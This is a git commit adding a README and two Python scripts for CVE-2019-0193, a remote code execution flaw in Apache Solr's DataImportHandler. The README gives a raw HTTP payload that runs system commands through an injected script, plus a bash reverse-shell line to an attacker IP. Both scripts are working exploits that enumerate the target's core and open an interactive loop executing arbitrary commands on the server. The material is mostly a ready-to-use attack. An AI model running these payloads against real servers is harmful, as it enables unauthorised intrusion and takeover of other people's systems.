add CVE-2019-0193(Apache Solr RCE)

2022-08-25 17:59:47 +08:00 · 2022-08-25 17:59:47 +08:00 · 8e93029df5
commit 8e93029df5
parent 2f741724c3
3 changed files with 268 additions and 0 deletions
--- a/远程命令执行漏洞（CVE-2019-0193）/README.md
+++ b/远程命令执行漏洞（CVE-2019-0193）/README.md
@ -0,0 +1,69 @@
+## 漏洞概述
+
+此次漏洞出现在Apache Solr的DataImportHandler，该模块是一个可选但常用的模块，用于从数据库和其他源中提取数据。
+
+它具有一个功能，其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。
+
+由于DIH配置可以包含脚本，因此攻击者可以通过构造危险的请求，从而造成远程命令执行
+### CVE
+CVE-2019-0193
+
+### 影响范围
+
+```http
+Solr < 8.2.0
+```
+
+### POC
+
+```bash
+python poc.py
+```
+
+### EXP
+
+方法一
+
+```bash
+python3 exp.py <url>
+```
+
+方法二
+
+访问`http://ip:8983/`Apache solr的管理页面，无需登录（默认未开启鉴权认证）
+
+```http
+POST /solr/tika/dataimport HTTP/1.1
+Host: solr.com:8983
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
+Accept: application/json, text/plain, */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Referer: http://solr.com:8983/solr/
+Content-type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Content-Length: 585
+Connection: close
+
+command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=
+<dataConfig>
+  <dataSource type="URLDataSource"/>
+  <script><![CDATA[
+          function poc(){ java.lang.Runtime.getRuntime().exec("echo '666' > ./666.txt");
+          }
+  ]]></script>
+  <document>
+    <entity name="stackoverflow"
+            url="https://stackoverflow.com/feeds/tag/solr"
+            processor="XPathEntityProcessor"
+            forEach="/feed"
+            transformer="script:poc" />
+  </document>
+</dataConfig>
+```
+
+```bash
+bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9999 0>&1  
+```
+
+如直接如上写入反弹无反应，需要base64加密写才能反弹一个shell
--- a/远程命令执行漏洞（CVE-2019-0193）/exp.py
+++ b/远程命令执行漏洞（CVE-2019-0193）/exp.py
@ -0,0 +1,92 @@
+#coding=utf-8
+
+import requests
+import sys
+import json
+import urllib.parse
+
+if len(sys.argv)!=2:
+    print('+ USE: python3 cve-2019-0193.py <url> +')
+    sys.exit(0)
+
+url = sys.argv[1]
+vuln_url = url + "/solr/test/dataimport"
+cmd = "whoami"
+
+
+#get core name
+core_url = url + "/solr/admin/cores?indexInfo=false&wt=json"
+try:
+    r = requests.request("GET", url=core_url, timeout=20)
+    core_name = list(json.loads(r.text)["status"])[0]
+    print ("[+] GET CORE NAME: "+url+"/solr/"+core_name+"/config")
+except:
+    print ("[-] Target Not Vuln Good Luck")
+    sys.exit(0)
+
+#check mode
+mode_url = url + "/solr/" +core_name+ "/admin/mbeans?cat=QUERY&wt=json"
+r = requests.request("GET", url=mode_url, timeout=20)
+mode = dict(dict(list(json.loads(r.text)["solr-mbeans"])[1])['/dataimport'])['class']
+if "org.apache.solr.handler.dataimport.DataImportHandler" in mode:
+    print ("[+] FIND MODE: "+mode)
+else:
+    print ("[-] Target Not Vuln Good Luck")
+    sys.exit(0)
+
+exp_url = url + "/solr/" +core_name+ "/dataimport"
+
+headers = {
+    'Host': "localhost:8983",
+    'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36",
+    'Accept': "application/json, text/plain, */*",
+    'Accept-Language': "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
+    'Accept-Encoding': "zip, deflate",
+    'Referer': ""+url+"/solr/",
+    'Content-type': "application/x-www-form-urlencoded",
+    'X-Requested-With': "XMLHttpRequest",
+    'Content-Length': "1007",
+    'Connection': "close"
+    }
+
+def do_exp(cmd):
+    payload = """
+    command=full-import&verbose=false&clean=false&commit=false&debug=true&core=test&name=dataimport&dataConfig=
+    <dataConfig>
+      <dataSource type="URLDataSource"/>
+      <script><![CDATA[
+              function poc(row){
+     var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("%s").getInputStream()));
+    var result = [];
+    while(true) {
+    var oneline = bufReader.readLine();
+    result.push( oneline );
+    if(!oneline) break;
+    }
+    row.put("title",result.join("\\n\\r"));
+    return row;
+    }
+      ]]></script>
+            <document>
+                 <entity name="entity1"
+                         url="https://raw.githubusercontent.com/1135/solr_exploit/master/URLDataSource/demo.xml"
+                         processor="XPathEntityProcessor"
+                         forEach="/RDF/item"
+                         transformer="script:poc">
+                            <field column="title" xpath="/RDF/item/title" />
+                 </entity>
+            </document>
+    </dataConfig>
+    """ % cmd
+    r = requests.request("POST", url=exp_url, data=payload, headers=headers, timeout=30)
+    try:
+        get_r = list(json.loads(r.text)["documents"])[0]
+        q = dict(get_r)['title']
+        print (q)
+    except:
+        print ("[*] Please wait... ... (About 1 minute)")
+    
+while 1:
+    cmd = input("Shell >>> ")
+    if cmd == "exit" : exit(0)
+    do_exp(cmd)
--- a/远程命令执行漏洞（CVE-2019-0193）/poc.py
+++ b/远程命令执行漏洞（CVE-2019-0193）/poc.py
@ -0,0 +1,107 @@
+#!/usr/bin/python3
+#-*- coding:utf-8 -*-
+# author : PeiQi
+# from   : http://wiki.peiqi.tech
+
+import requests
+import sys
+import json
+
+def title():
+    print('+------------------------------------------')
+    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')
+    print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')
+    print('+  \033[34m公众号 : PeiQi文库                                                     \033[0m')
+    print('+  \033[34mVersion: Apache Solr < 8.2.0            \033[0m')
+    print('+  \033[36m使用格式: python3 CVE-2019-0193.py       \033[0m')
+    print('+  \033[36mUrl    >>> http://xxx.xxx.xxx.xxx:8983  \033[0m')
+    print('+  \033[36mCmd    >>> whoami(命令执行)              \033[0m')
+    print('+------------------------------------------')
+
+def POC_1(target_url):
+    core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json"
+    try:
+        response = requests.request("GET", url=core_url, timeout=10)
+        core_name = list(json.loads(response.text)["status"])[0]
+        print("\033[32m[o] 成功获得core_name,Url为：" + target_url + "/solr/" + core_name + "/config\033[0m")
+        return core_name
+    except:
+        print("\033[31m[x] 目标Url漏洞利用失败\033[0m")
+        sys.exit(0)
+
+def POC_2(target_url, core_name):
+    mode_url = target_url + "/solr/" + core_name + "/admin/mbeans?cat=QUERY&wt=json"
+    response = requests.request("GET", url=mode_url, timeout=20)
+    mode = dict(dict(list(json.loads(response.text)["solr-mbeans"])[1])['/dataimport'])['class']
+    if "org.apache.solr.handler.dataimport.DataImportHandler" in mode:
+        print("\033[32m[o] 目标Url,Dataimport模块开启\033[0m")
+    else:
+        print("\033[31m[x] 目标Url,Dataimport模块未开启\033[0m")
+        sys.exit(0)
+
+def POC_3(target_url, core_name, cmd):
+    vuln_url = target_url + "/solr/" + core_name + "/dataimport"
+
+    headers = {
+        'Host': target_url,
+        'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
+        'Accept': "application/json, text/plain, */*",
+        'Accept-Language': "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
+        'Accept-Encoding': "zip, deflate",
+        'Referer': "" + target_url + "/solr/",
+        'Content-type': "application/x-www-form-urlencoded",
+        'X-Requested-With': "XMLHttpRequest",
+        'Content-Length': "1007",
+        'Connection': "close"
+    }
+
+    payload = """
+        command=full-import&verbose=false&clean=false&commit=false&debug=true&core=test&name=dataimport&dataConfig=
+        <dataConfig>
+          <dataSource type="URLDataSource"/>
+          <script><![CDATA[
+                  function poc(row){
+         var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("%s").getInputStream()));
+        var result = [];
+        while(true) {
+        var oneline = bufReader.readLine();
+        result.push( oneline );
+        if(!oneline) break;
+        }
+        row.put("title",result.join("\\n\\r"));
+        return row;
+        }
+          ]]></script>
+                <document>
+                     <entity name="entity1"
+                             url="https://raw.githubusercontent.com/1135/solr_exploit/master/URLDataSource/demo.xml"
+                             processor="XPathEntityProcessor"
+                             forEach="/RDF/item"
+                             transformer="script:poc">
+                                <field column="title" xpath="/RDF/item/title" />
+                     </entity>
+                </document>
+        </dataConfig>
+        """ % cmd
+
+    response = requests.request("POST", url=vuln_url, data=payload, headers=headers, timeout=30)
+    try:
+        get_message = list(json.loads(response.text)["documents"])[0]
+        message = dict(get_message)['title'][0]
+        print("\033[32m[o] 漏洞成功利用,响应为\n \033[0m", message)
+    except:
+        print("\033[31m[x] 代码执行失败 \033[0m")
+
+
+if __name__ == '__main__':
+    title()
+    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
+    core_name = POC_1(target_url)
+    POC_2(target_url, core_name)
+
+    while True:
+        cmd = input("\033[35mCmd >>> \033[0m")
+        if cmd == "exit":
+            exit(0)
+        else:
+            POC_3(target_url, core_name, cmd)